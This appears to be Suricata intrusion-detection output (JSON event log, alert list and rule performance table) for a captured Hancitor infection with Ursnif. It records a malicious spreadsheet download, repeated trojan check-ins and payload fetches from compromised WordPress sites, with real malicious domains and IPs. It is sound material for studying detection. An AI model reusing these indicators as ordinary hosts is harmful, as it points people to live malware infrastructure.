{"timestamp":"2019-01-16T17:47:27.049994+0000","flow_id":2003513897429348,"pcap_cnt":67,"event_type":"alert","src_ip":"47.74.2.183","src_port":80,"dest_ip":"10.1.16.101","dest_port":49166,"proto":"TCP","alert":{"action":"allowed","gid":1,"signature_id":2810419,"rev":1,"signature":"ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2019-01-16T17:47:42.798125+0000","flow_id":2003513897429348,"pcap_cnt":320,"event_type":"http","src_ip":"10.1.16.101","src_port":49166,"dest_ip":"47.74.2.183","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"auctionhauz.ca","url":"\/?82a1=SQTDEG3ImPlUFQiOQJZRIKG3CQi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword"}}
{"timestamp":"2019-01-16T17:47:42.798371+0000","flow_id":2003513897429348,"pcap_cnt":322,"event_type":"fileinfo","src_ip":"47.74.2.183","src_port":80,"dest_ip":"10.1.16.101","dest_port":49166,"proto":"TCP","http":{"hostname":"auctionhauz.ca","url":"\/?82a1=SQTDEG3ImPlUFQiOQJZRIKG3CQi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; WOW64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"application\/msword","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":274432},"app_proto":"http","fileinfo":{"filename":"invoice_925108.xls","gaps":false,"state":"CLOSED","stored":false,"size":274432,"tx_id":0}}
{"timestamp":"2019-01-16T17:49:48.480119+0000","flow_id":462252008035191,"pcap_cnt":323,"event_type":"dns","src_ip":"10.1.16.101","src_port":59342,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":10347,"rrname":"api.ipify.org","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"api.ipify.org","rrtype":"CNAME","ttl":2596,"rdata":"nagano-19599.herokussl.com"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"nagano-19599.herokussl.com","rrtype":"CNAME","ttl":2492,"rdata":"elb097307-934924932.us-east-1.elb.amazonaws.com"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"107.22.215.20"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"50.16.248.221"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"23.21.121.219"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"50.19.247.198"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"54.204.36.156"}}
{"timestamp":"2019-01-16T17:49:48.540094+0000","flow_id":462252008035191,"pcap_cnt":324,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59342,"proto":"UDP","dns":{"type":"answer","id":10347,"rcode":"NOERROR","rrname":"elb097307-934924932.us-east-1.elb.amazonaws.com","rrtype":"A","ttl":9,"rdata":"54.243.123.39"}}
{"timestamp":"2019-01-16T17:49:48.786023+0000","flow_id":2119922553217716,"pcap_cnt":331,"event_type":"alert","src_ip":"10.1.16.101","src_port":49170,"dest_ip":"107.22.215.20","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2021997,"rev":3,"signature":"ET POLICY External IP Lookup api.ipify.org","category":"Potential Corporate Privacy Violation","severity":1},"app_proto":"http"}
{"timestamp":"2019-01-16T17:49:48.786023+0000","flow_id":2119922553217716,"pcap_cnt":331,"event_type":"http","src_ip":"10.1.16.101","src_port":49170,"dest_ip":"107.22.215.20","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"api.ipify.org","url":"\/","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/plain"}}
{"timestamp":"2019-01-16T17:49:48.792836+0000","flow_id":586294958496004,"pcap_cnt":332,"event_type":"dns","src_ip":"10.1.16.101","src_port":59977,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43279,"rrname":"ledbabdintot.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:48.875661+0000","flow_id":586294958496004,"pcap_cnt":333,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":59977,"proto":"UDP","dns":{"type":"answer","id":43279,"rcode":"NOERROR","rrname":"ledbabdintot.com","rrtype":"A","ttl":589,"rdata":"77.72.134.167"}}
{"timestamp":"2019-01-16T17:49:49.440972+0000","flow_id":547318685807,"pcap_cnt":341,"event_type":"alert","src_ip":"10.1.16.101","src_port":49171,"dest_ip":"77.72.134.167","dest_port":80,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2819978,"rev":5,"signature":"ETPRO TROJAN Tordal\/Hancitor\/Chanitor Checkin","category":"A Network Trojan was detected","severity":1},"app_proto":"http"}
{"timestamp":"2019-01-16T17:49:49.440972+0000","flow_id":547318685807,"pcap_cnt":341,"event_type":"fileinfo","src_ip":"10.1.16.101","src_port":49171,"dest_ip":"77.72.134.167","dest_port":80,"proto":"TCP","http":{"hostname":"ledbabdintot.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"POST","protocol":"HTTP\/1.1","status":200,"length":1095},"app_proto":"http","fileinfo":{"filename":"\/4\/forum.php","gaps":false,"state":"CLOSED","stored":false,"size":119,"tx_id":0}}
{"timestamp":"2019-01-16T17:49:49.441089+0000","flow_id":547318685807,"pcap_cnt":342,"event_type":"http","src_ip":"10.1.16.101","src_port":49171,"dest_ip":"77.72.134.167","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"ledbabdintot.com","url":"\/4\/forum.php","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:49.442526+0000","flow_id":1161764741693598,"pcap_cnt":343,"event_type":"dns","src_ip":"10.1.16.101","src_port":51527,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":18488,"rrname":"jenrobin.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:49.531285+0000","flow_id":1161764741693598,"pcap_cnt":344,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":51527,"proto":"UDP","dns":{"type":"answer","id":18488,"rcode":"NOERROR","rrname":"jenrobin.com","rrtype":"A","ttl":4922,"rdata":"192.254.225.163"}}
{"timestamp":"2019-01-16T17:49:49.717401+0000","flow_id":973612961832745,"pcap_cnt":351,"event_type":"http","src_ip":"10.1.16.101","src_port":49172,"dest_ip":"192.254.225.163","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"jenrobin.com","url":"\/wp-content\/plugins\/mailchimp-for-wp\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:49.720773+0000","flow_id":973612961832745,"pcap_cnt":353,"event_type":"fileinfo","src_ip":"192.254.225.163","src_port":80,"dest_ip":"10.1.16.101","dest_port":49172,"proto":"TCP","http":{"hostname":"jenrobin.com","url":"\/wp-content\/plugins\/mailchimp-for-wp\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/jenrobin.com\/cgi-sys\/suspendedpage.cgi","length":291},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/mailchimp-for-wp\/1","gaps":false,"state":"CLOSED","stored":false,"size":291,"tx_id":0}}
{"timestamp":"2019-01-16T17:49:49.973808+0000","flow_id":973612961832745,"pcap_cnt":357,"event_type":"http","src_ip":"10.1.16.101","src_port":49172,"dest_ip":"192.254.225.163","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"jenrobin.com","url":"\/cgi-sys\/suspendedpage.cgi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:50.010874+0000","flow_id":1109870799366778,"pcap_cnt":358,"event_type":"dns","src_ip":"10.1.16.101","src_port":52955,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":64266,"rrname":"kevinalves.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:50.094948+0000","flow_id":1109870799366778,"pcap_cnt":359,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":52955,"proto":"UDP","dns":{"type":"answer","id":64266,"rcode":"NOERROR","rrname":"kevinalves.com","rrtype":"A","ttl":12570,"rdata":"192.232.218.126"}}
{"timestamp":"2019-01-16T17:49:50.250833+0000","flow_id":875251768391262,"pcap_cnt":366,"event_type":"http","src_ip":"10.1.16.101","src_port":49173,"dest_ip":"192.232.218.126","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"kevinalves.com","url":"\/wp-content\/plugins\/w3-total-cache\/inc\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:50.251364+0000","flow_id":875251768391262,"pcap_cnt":368,"event_type":"fileinfo","src_ip":"192.232.218.126","src_port":80,"dest_ip":"10.1.16.101","dest_port":49173,"proto":"TCP","http":{"hostname":"kevinalves.com","url":"\/wp-content\/plugins\/w3-total-cache\/inc\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/kevinalves.com\/cgi-sys\/suspendedpage.cgi","length":295},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/w3-total-cache\/inc\/1","gaps":false,"state":"CLOSED","stored":false,"size":295,"tx_id":0}}
{"timestamp":"2019-01-16T17:49:50.477298+0000","flow_id":875251768391262,"pcap_cnt":370,"event_type":"http","src_ip":"10.1.16.101","src_port":49173,"dest_ip":"192.232.218.126","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"kevinalves.com","url":"\/cgi-sys\/suspendedpage.cgi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:50.478413+0000","flow_id":2158688928156877,"pcap_cnt":371,"event_type":"dns","src_ip":"10.1.16.101","src_port":53392,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":43956,"rrname":"emilyhendrie.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:50.565893+0000","flow_id":2158688928156877,"pcap_cnt":372,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":53392,"proto":"UDP","dns":{"type":"answer","id":43956,"rcode":"NOERROR","rrname":"emilyhendrie.com","rrtype":"A","ttl":11672,"rdata":"192.254.234.16"}}
{"timestamp":"2019-01-16T17:49:50.745472+0000","flow_id":1298958882088552,"pcap_cnt":379,"event_type":"http","src_ip":"10.1.16.101","src_port":49174,"dest_ip":"192.254.234.16","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"emilyhendrie.com","url":"\/wp-content\/plugins\/jetpack\/modules\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:50.746157+0000","flow_id":1298958882088552,"pcap_cnt":381,"event_type":"fileinfo","src_ip":"192.254.234.16","src_port":80,"dest_ip":"10.1.16.101","dest_port":49174,"proto":"TCP","http":{"hostname":"emilyhendrie.com","url":"\/wp-content\/plugins\/jetpack\/modules\/1","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html","http_method":"GET","protocol":"HTTP\/1.1","status":302,"redirect":"http:\/\/emilyhendrie.com\/cgi-sys\/suspendedpage.cgi","length":299},"app_proto":"http","fileinfo":{"filename":"\/wp-content\/plugins\/jetpack\/modules\/1","gaps":false,"state":"CLOSED","stored":false,"size":299,"tx_id":0}}
{"timestamp":"2019-01-16T17:49:50.935913+0000","flow_id":1298958882088552,"pcap_cnt":383,"event_type":"http","src_ip":"10.1.16.101","src_port":49174,"dest_ip":"192.254.234.16","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"emilyhendrie.com","url":"\/cgi-sys\/suspendedpage.cgi","http_user_agent":"Mozilla\/5.0 (Windows NT 6.1; Win64; x64; Trident\/7.0; rv:11.0) like Gecko","http_content_type":"text\/html"}}
{"timestamp":"2019-01-16T17:49:50.937315+0000","flow_id":2103406256606563,"pcap_cnt":384,"event_type":"dns","src_ip":"10.1.16.101","src_port":49810,"dest_ip":"8.8.8.8","dest_port":53,"proto":"UDP","dns":{"type":"query","id":29931,"rrname":"salshakenwrap.com","rrtype":"A","tx_id":0}}
{"timestamp":"2019-01-16T17:49:51.018744+0000","flow_id":2103406256606563,"pcap_cnt":385,"event_type":"dns","src_ip":"8.8.8.8","src_port":53,"dest_ip":"10.1.16.101","dest_port":49810,"proto":"UDP","dns":{"type":"answer","id":29931,"rcode":"NOERROR","rrname":"salshakenwrap.com","rrtype":"A","ttl":14394,"rdata":"50.87.146.83"}}
{"timestamp":"2019-01-16T17:49:51.355657+0000","flow_id":669531424903294,"pcap_cnt":428,"event_type":"alert","src_ip":"50.87.146.83","src_port":80,"dest_ip":"10.1.16.101","dest_port":49175,"proto":"TCP","tx_id":0,"alert":{"action":"allowed","gid":1,"signature_id":2824549,"rev":2,"signature":"ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17

This file has been truncated.


suricata-4.0.0-etpro-all-alert-2019-01-31-T-11-12-00-01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap.txt - (7990 bytes)
01/16/2019-17:47:23.843622  [**] [1:2019837:3] ET WEB_CLIENT SUSPICIOUS Possible Office Doc with Embedded VBA Project (Wide) [**] [Classification: Potentially Bad Traffic] [Priority: 2] {TCP} 47.74.2.183:80 -> 10.1.16.101:49166
01/16/2019-17:47:25.868768  [**] [1:2810419:1] ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 47.74.2.183:80 -> 10.1.16.101:49166
01/16/2019-17:47:27.049994  [**] [1:2810419:1] ETPRO CURRENT_EVENTS Inbound cmd.exe Base64 Encoded (ASCII) 1 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 47.74.2.183:80 -> 10.1.16.101:49166
01/16/2019-17:49:48.786023  [**] [1:2021997:3] ET POLICY External IP Lookup api.ipify.org [**] [Classification: Potential Corporate Privacy Violation] [Priority: 1] {TCP} 10.1.16.101:49170 -> 107.22.215.20:80
01/16/2019-17:49:49.440972  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49171 -> 77.72.134.167:80
01/16/2019-17:49:51.355657  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 50.87.146.83:80 -> 10.1.16.101:49175
01/16/2019-17:49:57.837861  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49176 -> 77.72.134.167:80
01/16/2019-17:49:59.792429  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 50.87.146.83:80 -> 10.1.16.101:49175
01/16/2019-17:50:00.117639  [**] [1:2014411:11] ET TROJAN Fareit/Pony Downloader Checkin 2 [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49177 -> 77.72.134.167:80
01/16/2019-17:50:00.969946  [**] [1:2824549:2] ETPRO CURRENT_EVENTS Hancitor encrypted payload Jan 17 (1) [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 50.87.146.83:80 -> 10.1.16.101:49175
01/16/2019-17:51:19.743422  [**] [1:2017645:3] ET CURRENT_EVENTS DNS Query Domain .bit [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.16.101:64513 -> 192.71.245.208:53
01/16/2019-17:52:01.622762  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49186 -> 77.72.134.167:80
01/16/2019-17:54:02.381523  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49189 -> 77.72.134.167:80
01/16/2019-17:56:03.126264  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49196 -> 77.72.134.167:80
01/16/2019-17:58:03.854889  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49207 -> 77.72.134.167:80
01/16/2019-18:00:04.692897  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49216 -> 77.72.134.167:80
01/16/2019-18:01:16.929928  [**] [1:2017645:3] ET CURRENT_EVENTS DNS Query Domain .bit [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.16.101:63458 -> 192.71.245.208:53
01/16/2019-18:02:05.336719  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49227 -> 77.72.134.167:80
01/16/2019-18:04:05.886226  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49230 -> 77.72.134.167:80
01/16/2019-18:06:06.445482  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49239 -> 77.72.134.167:80
01/16/2019-18:08:07.134485  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49248 -> 77.72.134.167:80
01/16/2019-18:10:07.759147  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49257 -> 77.72.134.167:80
01/16/2019-18:11:16.599373  [**] [1:2017645:3] ET CURRENT_EVENTS DNS Query Domain .bit [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.16.101:63886 -> 192.71.245.208:53
01/16/2019-18:12:08.313488  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49268 -> 77.72.134.167:80
01/16/2019-18:14:08.861489  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49271 -> 77.72.134.167:80
01/16/2019-18:16:09.420495  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49280 -> 77.72.134.167:80
01/16/2019-18:18:09.986155  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49289 -> 77.72.134.167:80
01/16/2019-18:20:10.546540  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49298 -> 77.72.134.167:80
01/16/2019-18:21:14.395229  [**] [1:2017645:3] ET CURRENT_EVENTS DNS Query Domain .bit [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.16.101:61524 -> 192.71.245.208:53
01/16/2019-18:22:11.247360  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49309 -> 77.72.134.167:80
01/16/2019-18:24:11.948546  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49312 -> 77.72.134.167:80
01/16/2019-18:26:12.718625  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49323 -> 77.72.134.167:80
01/16/2019-18:28:13.556355  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49332 -> 77.72.134.167:80
01/16/2019-18:30:14.116876  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49341 -> 77.72.134.167:80
01/16/2019-18:30:51.858712  [**] [1:2017645:3] ET CURRENT_EVENTS DNS Query Domain .bit [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 10.1.16.101:49861 -> 192.71.245.208:53
01/16/2019-18:32:14.670843  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49352 -> 77.72.134.167:80
01/16/2019-18:34:15.226306  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49355 -> 77.72.134.167:80
01/16/2019-18:36:15.780792  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49366 -> 77.72.134.167:80
01/16/2019-18:38:16.517517  [**] [1:2819978:5] ETPRO TROJAN Tordal/Hancitor/Chanitor Checkin [**] [Classification: A Network Trojan was detected] [Priority: 1] {TCP} 10.1.16.101:49375 -> 77.72.134.167:80


suricata-4.0.0-etpro-all-perf.txt-2019-01-31-T-11-12-00-01312019.1111-2019-01-16-Hancitor-infection-traffic-with-Ursnif.pcap.txt - (66774 bytes)
  --------------------------------------------------------------------------
  Date: 1/31/2019 -- 11:12:00. Sorted by: max ticks.
  --------------------------------------------------------------------------
   Num      Rule         Gid      Rev      Ticks        %      Checks   Matches  Max Ticks   Avg Ticks   Avg Match   Avg No Match
  -------- ------------ -------- -------- ------------ ------ -------- -------- ----------- ----------- ----------- -------------- 
  1        2820158      1        2        20418406     4.55   22       0        17074734    928109.36   0.00        928109.36  
  2        2022547      1        1        2924722      0.65   65       0        2740314     44995.72    0.00        44995.72   
  3        2816328      1        5        2474641      0.55   55       0        898636      44993.47    0.00        44993.47   
  4        2811745      1        4        20139974     4.48   69       0        702172      291883.68   0.00        291883.68  
  5        2815263      1        3        651075       0.14   2        0        510008      325537.50   0.00        325537.50  
  6        2816510      1        3        7510786      1.67   43       0        506329      174669.44   0.00        174669.44  
  7        2820157      1        2        3690087      0.82   22       0        484527      167731.23   0.00        167731.23  
  8        2021774      1        2        832948       0.19   6        0        457639      138824.67   0.00        138824.67  
  9        2802987      1        5        1245904      0.28   14       0        446975      88993.14    0.00        88993.14   
  10       2024650      1        1        1816232      0.40   99       0        412036      18345.78    0.00        18345.78   
  11       2024771      1        1        2898854      0.65   395      0        391877      7338.87     0.00        7338.87    
  12       2820267      1        2        818346       0.18   31       0        359146      26398.26    0.00        26398.26   
  13       2809306      1        4        3066580      0.68   24       0        350086      127774.17   0.00        127774.17  
  14       2819930      1        2        856222       0.19   4        0        299119      214055.50   0.00        214055.50  
  15       2819664      1        2        851563       0.19   4        0        288153      212890.75   0.00        212890.75  
  16       2819940      1        3        6947973      1.55   43       0        245159      161580.77   0.00        161580.77  
  17       2802067      1        6        186438       0.04   1        0        186438      186438.00   0.00        186438.00  
  18       2012520      1        7        175125       0.04   1        1        175125      175125.00   175125.00   0.00       
  19       2020865      1        3        170885       0.04   1        0        170885      170885.00   0.00        170885.00  
  20       2803027      1        6        606205       0.13   7        0        159924      86600.71    0.00        86600.71   
  21       2018342      1        2        4144574      0.92   36       0        144529      115127.06   0.00        115127.06  
  22       2804907      1        3        206664       0.05   4        0        140883      51666.00    0.00        51666.00   
  23       2801930      1        7        685759       0.15   9        0        125113      76195.44    0.00        76195.44   
  24       2803657      1        5        248915       0.06   3        0        121977      82971.67    0.00        82971.67   
  25       2802035      1        4        119951       0.03   1        0        119951      119951.00   0.00        119951.00  
  26       2816327      1        4        2107971      0.47   55       0        117657      38326.75    0.00        38326.75   
  27       2815568      1        2        877271       0.20   27       0        113460      32491.52    0.00        32491.52   
  28       2801929      1        7        587504       0.13   9        0        112077      65278.22    0.00        65278.22   
  29       2021418      1        9        1284183      0.29   27       0        107281      47562.33    0.00        47562.33   
  30       2022543      1        1        9019442      2.01   626      0        107126      14408.05    0.00        14408.05   
  31       2816929      1        4        2242026      0.50   55       0        105470      40764.11    0.00        40764.11   
  32       2816940      1        2        3114163      0.69   55       0        104483      56621.15    0.00        56621.15   
  33       2804911      1        3        386280       0.09   5        0        104041      77256.00    0.00        77256.00   
  34       2816909      1        2        3131879      0.70   55       0        102029      56943.25    0.00        56943.25   
  35       2816509      1        2        617789       0.14   7        0        101788      88255.57    0.00        88255.57   
  36       2018666      1        4        14018303     3.12   445      0        100425      31501.80    0.00        31501.80   
  37       2819939      1        2        626368       0.14   7        0        98386       89481.14    0.00        89481.14   
  38       2802876      1        3        411280       0.09   18       0        98002       22848.89    0.00        22848.89   
  39       2804927      1        2        189435       0.04   4        0        97795       47358.75    0.00        47358.75   
  40       2804906      1        3        184335       0.04   3        0        97526       61445.00    0.00        61445.00   
  41       2022303      1        3        514542       0.11   6        0        94106       85757.00    0.00        85757.00   
  42       2820983      1        5        1303011      0.29   25       0        92866       52120.44    0.00        52120.44   
  43       2022502      1        4        2560513      0.57   54       0        91678       47416.91    0.00        47416.91   
  44       2821471      1        2        1219174      0.27   27       0        90719       45154.59    0.00        45154.59   
  45       2019343      1        3        1572439      0.35   53       0        89633       29668.66    0.00        29668.66   
  46       2821839      1        2        441262       0.10   6        0        88149       73543.67    0.00        73543.67   
